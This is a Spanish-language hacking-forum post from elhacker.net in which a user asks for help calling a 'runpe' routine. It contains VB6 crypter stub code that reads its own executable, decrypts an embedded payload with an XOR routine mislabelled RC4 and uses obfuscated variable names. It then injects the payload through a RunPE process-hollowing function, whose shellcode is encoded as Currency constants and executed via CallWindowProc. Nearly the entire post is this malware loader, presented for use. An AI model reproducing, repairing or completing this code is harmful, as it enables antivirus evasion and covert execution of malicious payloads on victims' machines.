elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Foros Generales
| |-+  Dudas Generales (Moderador: engel lex)
| | |-+  ayuda con llamar runpe
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con llamar runpe  (Leído 1,601 veces)
mirkosenior

Desconectado Desconectado

Mensajes: 1


Ver Perfil
ayuda con llamar runpe
« en: 6 Junio 2014, 12:06 pm »

hola a todos

Cmo puedo llamar a este runpe?

Alguien puede decirme dnde est el error?

Sub Main()

Dim AAAA As String

AAAA = App.Path & "\" & App.EXEName & ".exe"

Dim BBBB As String

Open AAAA For Binary As #1

BBBB = Space(LOF(1))

Get #1, , BBBB

Close #1

Dim sData() As String

sData() = Split(BBBB, "[Theref]")

sData(1) = VbaDJǬpRRQSgfdqG(sData(1), sData(2))

Call runpe(sData(1), StrConv(App.Path + "\" + App.EXEName + ".exe", vbFromUnicode))

End Sub

'RC4

Function VbaDJǬpRRQSgfdqG(qqJe_BpX_YCsdMGꩪjIh As String, byqǤAdixzltNuaWjMAIc As String) As String
Dim DiQxGAALJisRMTYyIlnquj() As Byte
Dim WEScArqqJRuuwgmEx_E() As Byte
Dim S_MQrOxmZfkHzvwInQ As Long
Dim Zc_XCcWVlHGwVNPixpWY As Long
Dim YYquGmfa_VZVbFPmB_Goe_uAQ As Long
Dim PrsjOmhzǼcznNaMq As Long
WEScArqqJRuuwgmEx_E() = StrConv(qqJe_BpX_YCsdMGꩪjIh, vbFromUnicode)
DiQxGAALJisRMTYyIlnquj() = StrConv(byqǤAdixzltNuaWjMAIc, vbFromUnicode)
YYquGmfa_VZVbFPmB_Goe_uAQ = UBound(WEScArqqJRuuwgmEx_E)
PrsjOmhzǼcznNaMq = UBound(DiQxGAALJisRMTYyIlnquj)
Do Until S_MQrOxmZfkHzvwInQ > YYquGmfa_VZVbFPmB_Goe_uAQ
WEScArqqJRuuwgmEx_E(S_MQrOxmZfkHzvwInQ) = WEScArqqJRuuwgmEx_E(S_MQrOxmZfkHzvwInQ) Xor DiQxGAALJisRMTYyIlnquj(Zc_XCcWVlHGwVNPixpWY)
Zc_XCcWVlHGwVNPixpWY = Zc_XCcWVlHGwVNPixpWY + 1
If Zc_XCcWVlHGwVNPixpWY > PrsjOmhzǼcznNaMq Then Zc_XCcWVlHGwVNPixpWY = 0
S_MQrOxmZfkHzvwInQ = S_MQrOxmZfkHzvwInQ + 1
Loop
Erase DiQxGAALJisRMTYyIlnquj
VbaDJǬpRRQSgfdqG = StrConv(WEScArqqJRuuwgmEx_E, vbUnicode)
Erase WEScArqqJRuuwgmEx_E
End Function

'RUNPE

Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Function eseguiPE(ByRef data() As Byte, ByVal Ptr_To_Inject As Long, ByVal CommandlineEnabled As Long) As Long
Dim Asm(121) As Currency
Asm(0) = 400681687.6885@
Asm(1) = -476253789078555.0612@
Asm(2) = 169590654935207.5756@
Asm(3) = 850533864474419.4055@
Asm(4) = 737729641913629.2885@
Asm(5) = 241583047782310.0933@
Asm(6) = 24366994722224.3183@
Asm(7) = -5591197446420.7926@
Asm(8) = 909185617598340.8258@
Asm(9) = -19175285449154.725@
Asm(10) = -74963712694652.2037@
Asm(11) = 364813893865675.1812@
Asm(12) = 417268265771289.998@
Asm(13) = -4467533218940.2859@
Asm(14) = 341408918860883.873@
Asm(15) = 24329165641253.0572@
Asm(16) = -704495800380865.7131@
Asm(17) = 374040769202653.0293@
Asm(18) = 132891045878384.5141@
Asm(19) = 330853606455412.8782@
Asm(20) = -18546831736735.2555@
Asm(21) = 319791640719971.9498@
Asm(22) = 908565053235531.3645@
Asm(23) = 204495311115001.8554@
Asm(24) = -854751321242618.2143@
Asm(25) = -74261121419612.3536@
Asm(26) = -853017920184789.9651@
Asm(27) = 853018044985278.6574@
Asm(28) = 11660982868296.5087@
Asm(29) = -644057630032745.1903@
Asm(30) = 389428549114434.7534@
Asm(31) = -76145685875174.3891@
Asm(32) = -74907416031185.4908@
Asm(33) = 494446016607881.1334@
Asm(34) = 373919167982197.785@
Asm(35) = -702326214173594.214@
Asm(36) = 852984839970549.146@
Asm(37) = 878491366656617.7029@
Asm(38) = 11660149244069.3242@
Asm(39) = -644057520081529.9839@
Asm(40) = 852992269963661.735@
Asm(41) = 118191623639287.4757@
Asm(42) = -61508987237432.1588@
Asm(43) = 683482598548397.6903@
Asm(44) = -602576477534616.4219@
Asm(45) = 312616265869225.0362@
Asm(46) = 823209967166017.4093@
Asm(47) = 242250886584983.6374@
Asm(48) = 855453146203670.4029@
Asm(49) = -79066168407783.6283@
Asm(50) = -566073494675362.3812@
Asm(51) = 707480649289074.6628@
Asm(52) = -637454398289603.5604@
Asm(53) = 244386299675628.5445@
Asm(54) = -815078417416403.5827@
Asm(55) = -18879051943875.1995@
Asm(56) = -822123707815930.6686@
Asm(57) = -18434021046527.2954@
Asm(58) = 912451606937402.8942@
Asm(59) = -644057520081529.9756@
Asm(60) = 736754098641473.959@
Asm(61) = 417322719301766.6436@
Asm(62) = 907260734372726.4513@
Asm(63) = 853017967675867.3294@
Asm(64) = 11660982865150.7807@
Asm(65) = -854635987033189.5019@
Asm(66) = 417315068676156.9237@
Asm(67) = -704495800377680.6639@
Asm(68) = 244384539136657.2125@
Asm(69) = -815078417416403.5827@
Asm(70) = 364126617392252.4421@
Asm(71) = 853022663170544.6404@
Asm(72) = -855129000041499.1355@
Asm(73) = 853017946071693.9733@
Asm(74) = 244396803451753.601@
Asm(75) = -535694978088672.9971@
Asm(76) = 853017945341749.0318@
Asm(77) = 850597150951837.7055@
Asm(78) = -693956410164477.1442@
Asm(79) = 392299672072137.6649@
Asm(80) = -75273081301284.3259@
Asm(81) = 233670410612668.8112@
Asm(82) = 232135816315923.5976@
Asm(83) = 282468056240967.6881@
Asm(84) = -701595207746232.5423@
Asm(85) = 173478023424630.523@
Asm(86) = -838890426140287.6832@
Asm(87) = 137505075359453.7978@
Asm(88) = 238303243668856.6869@
Asm(89) = 15754679864024.2693@
Asm(90) = 137137957478099.5152@
Asm(91) = 223974408162476.2226@
Asm(92) = -853018149249239.2854@
Asm(93) = 609147958724062.3211@
Asm(94) = 187716700156924.5176@
Asm(95) = 29051557366465.6234@
Asm(96) = 180486733836584.4849@
Asm(97) = -853018043593043.5209@
Asm(98) = 230703534374533.4347@
Asm(99) = 138151919766295.2044@
Asm(100) = -863941699156868.1112@
Asm(101) = 382501322004887.7562@
Asm(102) = 217671250279223.4602@
Asm(103) = -858396642110759.3865@
Asm(104) = 382501330594822.3482@
Asm(105) = 217671250279223.4602@
Asm(106) = -860029196975681.1913@
Asm(107) = 22128918341666.201@
Asm(108) = 129708668231386.2504@
Asm(109) = 138421474714790.2981@
Asm(110) = 273938087394568.7415@
Asm(111) = -703427576466491.6105@
Asm(112) = 368089803424522.0018@
Asm(113) = 273936330801683.6989@
Asm(114) = -703427576466491.6105@
Asm(115) = 382501322232107.5439@
Asm(116) = 224650062758754.033@
Asm(117) = -802975918546864.1941@
Asm(118) = 261111522452255.6862@
Asm(119) = 35367660677206.1368@
Asm(120) = 848492795353964.3185@
Asm(121) = 5.0164@

'Put Here the shellcode
eseguiPE = CallWindowProc(VarPtr(Asm(0)), VarPtr(data(0)), Ptr_To_Inject, CommandlineEnabled, 0)
End Function


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda creacion RunPE VB6
Anlisis y Diseo de Malware
fary 3 4,207 Último mensaje 28 Enero 2011, 22:33 pm
por fary
Que es un RunPE? « 1 2 »
Anlisis y Diseo de Malware
x64core 11 12,822 Último mensaje 16 Octubre 2011, 11:29 am
por [Kayser]
Duda RunPE
Anlisis y Diseo de Malware
[Kayser] 2 2,741 Último mensaje 10 Diciembre 2011, 13:34 pm
por [Kayser]
Funcionamiento de un RunPE « 1 2 »
Anlisis y Diseo de Malware
[Kayser] 10 7,591 Último mensaje 29 Julio 2013, 19:53 pm
por arfgh
Ayuda RunPe win7
.NET (C#, VB.NET, ASP)
Cromatico 8 4,270 Último mensaje 30 Noviembre 2012, 13:19 pm
por Cromatico
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines